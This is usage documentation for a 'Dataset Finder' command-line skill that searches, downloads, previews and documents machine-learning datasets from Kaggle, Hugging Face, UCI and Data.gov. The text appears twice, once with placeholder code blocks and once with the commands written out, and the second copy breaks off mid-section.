Dataset Finder
Search, download, and explore datasets from multiple repositories including Kaggle, Hugging Face, UCI ML Repository, and Data.gov. Preview statistics, generate data cards, and manage datasets for machine learning projects.
⚠️ Prerequisite: Install OpenClawCLI (Windows, MacOS)
Installation:
CODEBLOCK0
Never use --break-system-packages as it can damage your system's Python installation.
Quick Reference
| Task | Command |
|---|---|
| Search Kaggle | `python scripts/dataset.py kaggle search "housing prices"` |
| Download Kaggle dataset | `python scripts/dataset.py kaggle download "username/dataset-name"` |
| Search Hugging Face | `python scripts/dataset.py huggingface search "sentiment"` |
| Download HF dataset | `python scripts/dataset.py huggingface download "dataset-name"` |
| Search UCI ML | `python scripts/dataset.py uci search "classification"` |
| Preview dataset | `python scripts/dataset.py preview dataset.csv` |
| Generate data card | `python scripts/dataset.py datacard dataset.csv --output README.md` |
| List local datasets | `python scripts/dataset.py list` |
Core Features
1. Multi-Repository Search
Search across multiple data repositories from a single interface.
Supported Sources:
- Kaggle - ML competitions and community datasets
- Hugging Face - NLP, vision, and audio datasets
- UCI ML Repository - Classic ML datasets
- Data.gov - US government open data
- Local - Manage downloaded datasets
2. Dataset Download
Download datasets with automatic format detection.
Supported formats:
- CSV, TSV
- JSON, JSONL
- Parquet
- Excel (XLSX, XLS)
- ZIP archives
- HDF5
- Feather
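One simple way to picture format detection is a lookup on the file extension. The sketch below is illustrative only: `detect_format` and `EXTENSION_FORMATS` are hypothetical names, and the tool's actual detection logic is not described in this document.

```python
from pathlib import Path

# Hypothetical mapping from file extension to a format label.
# The real tool may detect formats differently (for example by content).
EXTENSION_FORMATS = {
    ".csv": "csv",
    ".tsv": "tsv",
    ".json": "json",
    ".jsonl": "jsonl",
    ".parquet": "parquet",
    ".xlsx": "excel",
    ".xls": "excel",
    ".zip": "zip",
    ".h5": "hdf5",
    ".hdf5": "hdf5",
    ".feather": "feather",
}


def detect_format(path: str) -> str:
    """Return a format label based on the file extension, or 'unknown'."""
    suffix = Path(path).suffix.lower()
    return EXTENSION_FORMATS.get(suffix, "unknown")


for name in ["train.CSV", "reviews.jsonl", "archive.zip", "notes.txt"]:
    print(name, "->", detect_format(name))
```

Extension matching is cheap but can be fooled by misnamed files, so a more careful implementation might also inspect the first bytes of the file.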
3. Dataset Preview
Get quick statistics and insights without loading entire datasets.
Preview features:
- Shape (rows × columns)
- Column names and types
- Missing value counts
- Basic statistics (mean, std, min, max)
- Memory usage
- Sample rows
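The preview features listed above can be approximated with pandas by parsing only the first rows of a file. This is a minimal sketch under that assumption, not the tool's implementation; `preview` and `sample_rows` are hypothetical names, and the reported shape describes the sampled rows rather than the whole file.

```python
import io

import pandas as pd

# Small in-memory CSV standing in for a real file on disk.
SAMPLE_CSV = """id,price,city
1,100.0,Austin
2,,Boston
3,250.5,Austin
4,80.0,
"""


def preview(source, sample_rows=1000):
    """Summarize the first `sample_rows` rows of a CSV source."""
    # nrows limits how many rows pandas parses, so large files stay cheap.
    df = pd.read_csv(source, nrows=sample_rows)
    return {
        "shape": df.shape,
        "dtypes": {col: str(dtype) for col, dtype in df.dtypes.items()},
        "missing": {col: int(n) for col, n in df.isna().sum().items()},
        # describe() covers numeric columns only by default.
        "stats": df.describe().loc[["mean", "std", "min", "max"]],
        "memory_bytes": int(df.memory_usage(deep=True).sum()),
        "sample": df.head(3),
    }


summary = preview(io.StringIO(SAMPLE_CSV))
print(summary["shape"])
print(summary["missing"])
```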
4. Data Card Generation
Automatically generate dataset documentation.
Includes:
- Dataset description
- Schema information
- Statistics summary
- Usage examples
- License information
- Citation details
Repository-Specific Commands
Kaggle
Search and download datasets from Kaggle.
Setup:
1. Get Kaggle API credentials from https://www.kaggle.com/settings
2. Place `kaggle.json` in `~/.kaggle/` (Linux/Mac) or `%USERPROFILE%\.kaggle\` (Windows)
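Before running Kaggle commands it can help to confirm the credentials file is where it is expected. The following is a rough sketch: `check_kaggle_credentials` is a hypothetical helper, and the permission check assumes the common recommendation that the file should not be readable by other users on POSIX systems.

```python
import os
import stat
import tempfile
from pathlib import Path


def check_kaggle_credentials(home=None):
    """Return (path, problems) for the kaggle.json under `home`/.kaggle."""
    home = Path(home) if home is not None else Path.home()
    cred_path = home / ".kaggle" / "kaggle.json"
    problems = []
    if not cred_path.is_file():
        problems.append("kaggle.json not found")
    elif os.name == "posix":
        mode = stat.S_IMODE(cred_path.stat().st_mode)
        # Any group/other permission bit means other users may access the key.
        if mode & 0o077:
            problems.append(f"permissions too open: {oct(mode)}")
    return cred_path, problems


# Demo against an empty temporary "home" so no real credentials are touched.
with tempfile.TemporaryDirectory() as tmp:
    print(check_kaggle_credentials(tmp)[1])
```

Calling `check_kaggle_credentials()` with no argument checks the current user's home directory instead.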
CODEBLOCK1
Search options:
- `--file-type` - Filter by file type (csv, json, etc.)
- `--license` - Filter by license type
- `--sort-by` - Sort by hotness, votes, updated, or relevance
- `--max-results` - Limit number of results
Output:
CODEBLOCK2
Hugging Face Datasets
Search and download datasets from Hugging Face Hub.
CODEBLOCK3
Search options:
- `--task` - Filter by task (text-classification, translation, etc.)
- `--language` - Filter by language code
- `--multimodal` - Include multimodal datasets
- `--benchmark` - Only benchmark datasets
- `--max-results` - Limit results
Output:
CODEBLOCK4
UCI ML Repository
Search and download classic ML datasets.
CODEBLOCK5
Search options:
- `--task-type` - classification, regression, clustering
- `--min-samples` - Minimum number of instances
- `--min-features` - Minimum number of features
- `--data-type` - tabular, text, image, time-series
Output:
CODEBLOCK6
Data.gov
Search US government open data.
CODEBLOCK7
Search options:
- `--organization` - Filter by publishing organization
- `--tags` - Filter by tags (comma-separated)
- `--format` - Filter by format (csv, json, xml, etc.)
- `--max-results` - Limit results
Output:
1. 2020 Census Demographic Data
Organization: census.gov
Format: CSV
Size: 125 MB
Last updated: 2023-01-15
Tags: census, demographics, population
URL: https://catalog.data.gov/dataset/...
Dataset Management
Preview Datasets
Get quick insights without loading entire datasets.
CODEBLOCK9
Output:
CODEBLOCK10
Generate Data Cards
Create standardized dataset documentation.
CODEBLOCK11
Generated data card includes:
- Dataset description
- File information (size, format, rows, columns)
- Schema (column names, types, descriptions)
- Statistics (distributions, missing values, correlations)
- Sample data
- Usage examples
- License and citation
- Known issues/limitations
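To make the idea concrete, here is a small sketch that renders a few of these sections from a pandas DataFrame. It is an assumption-laden illustration: `make_data_card` is a hypothetical function, it covers only the description, basic information, and schema sections, and it is not the generator used by the `datacard` command.

```python
import pandas as pd


def make_data_card(df, title, description):
    """Render a minimal Markdown data card for a DataFrame."""
    lines = [
        f"# Dataset Card: {title}",
        "",
        "## Dataset Description",
        description,
        "",
        "## Dataset Information",
        f"- **Rows:** {len(df):,}",
        f"- **Columns:** {df.shape[1]}",
        "",
        "## Schema",
        "| Column | Type | Missing |",
        "|--------|------|---------|",
    ]
    # One schema row per column: name, pandas dtype, count of missing values.
    for col in df.columns:
        missing = int(df[col].isna().sum())
        lines.append(f"| {col} | {df[col].dtype} | {missing} |")
    return "\n".join(lines) + "\n"


df = pd.DataFrame({"Id": [1, 2, 3], "SalePrice": [208500, None, 223500]})
card = make_data_card(df, "Housing Prices", "Toy example with three rows.")
print(card)
```

License, citation, and known-limitations sections cannot be derived from the data itself, so a real card would need them supplied from repository metadata or by hand.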
Example output (DATACARD.md):
# Dataset Card: Housing Prices
## Dataset Description
This dataset contains housing prices and features for regression analysis.
## Dataset Information
- **Format:** CSV
- **Size:** 1.2 MB
- **Rows:** 1,460
- **Columns:** 81
## Schema
| Column | Type | Description | Missing |
|--------|------|-------------|---------|
| Id | int64 | Unique identifier | 0 |
| MSSubClass | int64 | Building class | 0 |
| LotArea | int64 | Lot size in sq ft | 0 |
| SalePrice | int64 | Sale price | 0 |
...
## Statistics
- Numerical features: 38
- Categorical features: 43
- Missing values: 19 columns affected
- Target variable: SalePrice (range: $34,900 - $755,000)
## Usage
```python
import pandas as pd

df = pd.read_csv('housing_prices.csv')
```
CODEBLOCK13
List Local Datasets
Manage downloaded datasets.
CODEBLOCK14
Output:
Local Datasets (5 total, 2.5 GB):
1. zillow/zecon (Kaggle)
Downloaded: 2024-01-15
Size: 1.5 MB
Files: train.csv, test.csv
Location: datasets/kaggle/zillow/zecon/
2. imdb (Hugging Face)
Downloaded: 2024-01-20
Size: 84.1 MB
Splits: train, test, unsupervised
Location: datasets/huggingface/imdb/
3. iris (UCI ML)
Downloaded: 2024-01-18
Size: 4.5 KB
Files: iris.data, iris.names
Location: datasets/uci/iris/
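A listing like the one above can be approximated by walking the download directory. The sketch below assumes a `datasets/<source>/<name>/` layout as suggested by the sample output; `list_local_datasets` is a hypothetical helper and does not read whatever metadata the tool itself may store.

```python
import tempfile
from pathlib import Path


def list_local_datasets(root):
    """Yield (relative_dir, file_names, total_bytes) for folders holding files."""
    root = Path(root)
    for folder in sorted(p for p in root.rglob("*") if p.is_dir()):
        files = sorted(f for f in folder.iterdir() if f.is_file())
        if files:
            size = sum(f.stat().st_size for f in files)
            yield folder.relative_to(root).as_posix(), [f.name for f in files], size


# Build a tiny fake dataset tree so the example runs anywhere.
with tempfile.TemporaryDirectory() as tmp:
    iris = Path(tmp) / "uci" / "iris"
    iris.mkdir(parents=True)
    (iris / "iris.data").write_text("5.1,3.5,1.4,0.2,Iris-setosa\n")
    (iris / "iris.names").write_text("Iris Plants Database\n")
    listing = list(list_local_datasets(tmp))

for rel_dir, names, size in listing:
    print(f"{rel_dir}: {', '.join(names)} ({size} bytes)")
```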
Common Workflows
Machine Learning Project Setup
Find and download datasets for a new ML project.
CODEBLOCK16
NLP Project Dataset Collection
Gather text datasets for NLP tasks.
CODEBLOCK17
Dataset Comparison
Compare multiple datasets for selection.
CODEBLOCK18
Building a Dataset Library
Organize datasets for team use.
CODEBLOCK19
Data Quality Assessment
Assess dataset quality before use.
CODEBLOCK20
Advanced Features
Batch Download
Download multiple datasets at once.
CODEBLOCK21
Dataset Conversion
Convert between formats.
CODEBLOCK22
Dataset Splitting
Split datasets for ML workflows.
CODEBLOCK23
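For readers who prefer to split in Python directly, a reproducible train/test split can be sketched with pandas alone. This is an illustration of the general technique rather than a description of the tool's split command; `train_test_split_frame` is a hypothetical name, and the approach assumes the DataFrame index is unique because the test rows are removed by index label.

```python
import pandas as pd


def train_test_split_frame(df, test_fraction=0.2, seed=42):
    """Shuffle rows reproducibly and split into (train, test) DataFrames."""
    if not 0 < test_fraction < 1:
        raise ValueError("test_fraction must be between 0 and 1")
    # Sample the test rows at random, then keep everything else for training.
    test = df.sample(frac=test_fraction, random_state=seed)
    train = df.drop(test.index)
    return train, test


df = pd.DataFrame({"x": range(10), "y": [i % 2 for i in range(10)]})
train, test = train_test_split_frame(df, test_fraction=0.2)
print(len(train), len(test))
```

A fixed `seed` keeps the split stable across runs, which matters when comparing models trained at different times.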
Dataset Merging
Combine multiple datasets.
CODEBLOCK24
Best Practices
Search Strategy
1. Start broad - Use general keywords first
2. Refine iteratively - Add filters based on results
3. Check multiple sources - Different repositories have different strengths
4. Review metadata - Check size, format, license before downloading
Download Management
1. Check size first - Use search to see dataset size
2. Preview before download - When possible, preview samples
3. Organize by source - Keep repository structure clear
4. Track downloads - Use list command to manage local datasets
Data Quality
1. Always preview - Check data before using
2. Generate data cards - Document all datasets
3. Validate data - Check for missing values, outliers
4. Keep metadata - Save original descriptions and licenses
Storage
1. Use version control - Track dataset versions
2. Compress when possible - Use Parquet or HDF5 for large datasets
3. Clean regularly - Remove unused datasets
4. Backup important data - Keep copies of critical datasets
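One lightweight way to track dataset versions is to record a checksum for each file and compare it later. The sketch below shows that idea with the standard library; `file_sha256` is a hypothetical helper, and nothing here implies the tool records checksums itself.

```python
import hashlib
import tempfile
from pathlib import Path


def file_sha256(path, block_size=1 << 20):
    """Hash a file in blocks so large datasets need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for block in iter(lambda: handle.read(block_size), b""):
            digest.update(block)
    return digest.hexdigest()


# Demonstrate that editing a file changes its recorded checksum.
with tempfile.TemporaryDirectory() as tmp:
    data_file = Path(tmp) / "train.csv"
    data_file.write_bytes(b"id,label\n1,0\n")
    before = file_sha256(data_file)
    data_file.write_bytes(b"id,label\n1,1\n")
    after = file_sha256(data_file)

print(before != after)
```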
Troubleshooting
Installation Issues
"Missing required dependency"
CODEBLOCK25
"Kaggle API credentials not found"
1. Go to https://www.kaggle.com/settings
2. Click "Create New API Token"
3. Save `kaggle.json` to:
   - Linux/Mac: `~/.kaggle/`
   - Windows: `%USERPROFILE%\.kaggle\`
4. Set permissions: INLINECODE32
"Hugging Face authentication required"
CODEBLOCK26
Search Issues
"No results found"
- Try broader search terms
- Remove restrictive filters
- Check spelling
- Try different repository
"Search timeout"
- Check internet connection
- Repository may be down temporarily
- Try again in a few minutes
Download Issues
"Download failed"
- Check internet connection
- Verify dataset still exists
- Check available disk space
- Try downloading specific files
"Permission denied"
- Some datasets require accepting terms
- May need API credentials
- Check dataset license
"Out of memory"
- Use streaming for large datasets
- Download in chunks
- Use Parquet instead of CSV
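When a file is already on disk but too large to load at once, reading it in chunks keeps memory use bounded. The following sketch uses the `chunksize` parameter of `pandas.read_csv`; `chunked_mean` is a hypothetical helper chosen to show the pattern, and the in-memory CSV stands in for a real large file.

```python
import io

import pandas as pd

# Stand-in for a large file; in practice pass a file path instead.
CSV_TEXT = "value\n" + "\n".join(str(i) for i in range(1, 101)) + "\n"


def chunked_mean(source, column, chunksize=25):
    """Compute a column mean while holding only one chunk in memory."""
    total = 0.0
    count = 0
    # With chunksize set, read_csv returns an iterator of DataFrames.
    for chunk in pd.read_csv(source, usecols=[column], chunksize=chunksize):
        values = chunk[column].dropna()
        total += values.sum()
        count += len(values)
    return total / count if count else float("nan")


print(chunked_mean(io.StringIO(CSV_TEXT), "value"))
```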
Preview Issues
"Cannot load dataset"
- Check file format
- Verify file is not corrupted
- Try specifying encoding: INLINECODE33
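If the right encoding is unknown, one option is to try a short list of candidates in order. This is a sketch of that fallback, independent of the tool's own options; `read_text_with_fallback` and its default encoding list are assumptions made for illustration.

```python
import tempfile
from pathlib import Path


def read_text_with_fallback(path, encodings=("utf-8", "cp1252", "latin-1")):
    """Return (text, encoding) using the first encoding that decodes cleanly."""
    data = Path(path).read_bytes()
    for encoding in encodings:
        try:
            return data.decode(encoding), encoding
        except UnicodeDecodeError:
            continue
    raise ValueError(f"none of {encodings} could decode {path}")


# Write a file in a legacy encoding to show UTF-8 failing and the fallback working.
with tempfile.TemporaryDirectory() as tmp:
    sample = Path(tmp) / "cities.csv"
    sample.write_bytes("city\nMálaga\n".encode("latin-1"))
    text, used = read_text_with_fallback(sample)

print(used)
```

Note that `latin-1` accepts every byte sequence, so as a last resort it never fails but may produce wrong characters; the detected encoding should be checked against a few sample rows.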
"Preview too slow"
- Use smaller sample size
- Preview first N rows only
- Use format-specific tools
Command Reference
CODEBLOCK27
Examples by Use Case
Quick Dataset Search
CODEBLOCK28
Download and Preview
CODEBLOCK29
Multi-Source Search
CODEBLOCK30
Dataset Management
CODEBLOCK31
Support
For issues or questions:
1. Check this documentation
2. Run INLINECODE34
3. Verify API credentials are set
4. Check repository-specific documentation
Resources:
- OpenClawCLI: https://clawhub.ai/
- Kaggle API: https://github.com/Kaggle/kaggle-api
- Hugging Face Datasets: https://huggingface.co/docs/datasets/
- UCI ML Repository: https://archive.ics.uci.edu/ml/
- Data.gov API: https://www.data.gov/developers/apis
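Dataset Finder
Search, download, and explore datasets from multiple repositories including Kaggle, Hugging Face, UCI ML Repository, and Data.gov. Preview statistics, generate data cards, and manage datasets for machine learning projects.
⚠️ Prerequisite: Install OpenClawCLI (Windows, MacOS)
Installation:
```bash
# Standard installation
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4
# If you hit permission errors, use a virtual environment
python -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4
```
Never use --break-system-packages as it can damage your system's Python installation.
Quick Reference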
| Task | Command |
|---|---|
| Search Kaggle | `python scripts/dataset.py kaggle search "housing prices"` |
| Download Kaggle dataset | `python scripts/dataset.py kaggle download "username/dataset-name"` |
| Search Hugging Face | `python scripts/dataset.py huggingface search "sentiment"` |
| Download HF dataset | `python scripts/dataset.py huggingface download "dataset-name"` |
| Search UCI ML | `python scripts/dataset.py uci search "classification"` |
| Preview dataset | `python scripts/dataset.py preview dataset.csv` |
| Generate data card | `python scripts/dataset.py datacard dataset.csv --output README.md` |
| List local datasets | `python scripts/dataset.py list` |
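Core Features
1. Multi-Repository Search
Search across multiple data repositories from a single interface.
Supported Sources:
- Kaggle - ML competitions and community datasets
- Hugging Face - NLP, vision, and audio datasets
- UCI ML Repository - Classic ML datasets
- Data.gov - US government open data
- Local - Manage downloaded datasets
2. Dataset Download
Download datasets with automatic format detection.
Supported formats:
- CSV, TSV
- JSON, JSONL
- Parquet
- Excel (XLSX, XLS)
- ZIP archives
- HDF5
- Feather
3. Dataset Preview
Get quick statistics and insights without loading entire datasets.
Preview features:
- Shape (rows × columns)
- Column names and types
- Missing value counts
- Basic statistics (mean, std, min, max)
- Memory usage
- Sample rows
4. Data Card Generation
Automatically generate dataset documentation.
Includes:
- Dataset description
- Schema information
- Statistics summary
- Usage examples
- License information
- Citation details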
Repository-Specific Commands
Kaggle
Search and download datasets from Kaggle.
Setup:
1. Get Kaggle API credentials from https://www.kaggle.com/settings
2. Place `kaggle.json` in `~/.kaggle/` (Linux/Mac) or `%USERPROFILE%\.kaggle\` (Windows)
```bash
# Search datasets
python scripts/dataset.py kaggle search "house prices"
# Search with filters
python scripts/dataset.py kaggle search "NLP" --file-type csv --sort-by hotness
# Download a dataset
python scripts/dataset.py kaggle download "zillow/zecon"
# Download a specific file
python scripts/dataset.py kaggle download "username/dataset" --file train.csv
# List dataset files
python scripts/dataset.py kaggle list "username/dataset-name"
```
Search options:
- `--file-type` - Filter by file type (csv, json, etc.)
- `--license` - Filter by license type
- `--sort-by` - Sort by hotness, votes, updated, or relevance
- `--max-results` - Limit number of results
Output:
1. House Prices - Advanced Regression Techniques
Owner: zillow/zecon
Size: 1.5 MB
Last updated: 2023-06-15
Downloads: 150,000+
URL: https://www.kaggle.com/datasets/zillow/zecon
2. Housing Prices Dataset
Owner: username/housing-data
Size: 850 KB
Last updated: 2023-08-20
Downloads: 50,000+
URL: https://www.kaggle.com/datasets/username/housing-data
Hugging Face Datasets
Search and download datasets from Hugging Face Hub.
```bash
# Search datasets
python scripts/dataset.py huggingface search "sentiment analysis"
# Search with filters
python scripts/dataset.py huggingface search "NLP" --task text-classification --language en
# Download a dataset
python scripts/dataset.py huggingface download "imdb"
# Download a specific split
python scripts/dataset.py huggingface download "imdb" --split train
# Download a specific configuration
python scripts/dataset.py huggingface download "glue" --config mrpc
# Stream a large dataset
python scripts/dataset.py huggingface download "large-dataset" --streaming
```
Search options:
- `--task` - Filter by task (text-classification, translation, etc.)
- `--language` - Filter by language code
- `--multimodal` - Include multimodal datasets
- `--benchmark` - Only benchmark datasets
- `--max-results` - Limit results
Output:
1. IMDB Movie Reviews
Dataset ID: imdb
Task: Sentiment classification
Language: en
Size: 84.1 MB
Downloads: 1M+
URL: https://huggingface.co/datasets/imdb
2. Stanford Sentiment Treebank
Dataset ID: sst2
Task: Sentiment classification
Language: en
Size: 7.4 MB
Downloads: 500K+
URL: https://huggingface.co/datasets/sst2
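UCI ML Repository
Search and download classic ML datasets.
```bash
# Search datasets
python scripts/dataset.py uci search "classification"
# Search by characteristics
python scripts/dataset.py uci search "regression" --min-samples 1000
# Download a dataset
python scripts/dataset.py uci download "iris"
# Download with metadata
python scripts/dataset.py uci download "wine-quality" --include-metadata
```
Search options:
- `--task-type` - classification, regression, clustering
- `--min-samples` - Minimum number of instances
- `--min-features` - Minimum number of features
- `--data-type` - tabular, text, image, time-series
Output:
1. Iris Dataset
ID: iris
Task: Classification
Samples: 150
Features: 4
Classes: 3
Missing values: None
URL: https://archive.ics.uci.edu/ml/datasets/iris
2. Wine Quality
ID: wine-quality
Task: Classification/Regression
Samples: 6497
Features: 11
Missing values: None
URL: https://archive.ics.uci.edu/ml/datasets/wine+quality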
Data.gov
Search US government open data.
```bash
# Search datasets
python scripts/dataset.py datagov search "census"
# Search filtered by organization
python scripts/dataset.py datagov search "health" --organization cdc.gov
# Search by topic
python scripts/dataset.py datagov search "education" --tags schools,students
# Download a dataset
python scripts/dataset.py datagov download dataset-id
```
Search options:
- `--organization` - Filter by publishing organization
- `--tags` - Filter by tags (comma-separated)
- `--format` - Filter by format (csv, json, xml, etc.)
- `--max-results` - Limit results
Output:
1. 2020 Census Demographic Data
Organization: census.gov
Format: CSV
Size: 125 MB
Last updated: 2023-01-15
Tags: census, demographics, population
URL: https://catalog.data.gov/dataset/...
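Dataset Management
Preview Datasets
Get quick insights without loading entire datasets.
bash
# Basic preview
python scripts/dataset.py preview data.csv
# Detailed statistics
python scripts/dataset.py preview data.csv --detailed
# Custom sample size
python scripts/dataset.py preview data.csv --sample 20
# Multiple files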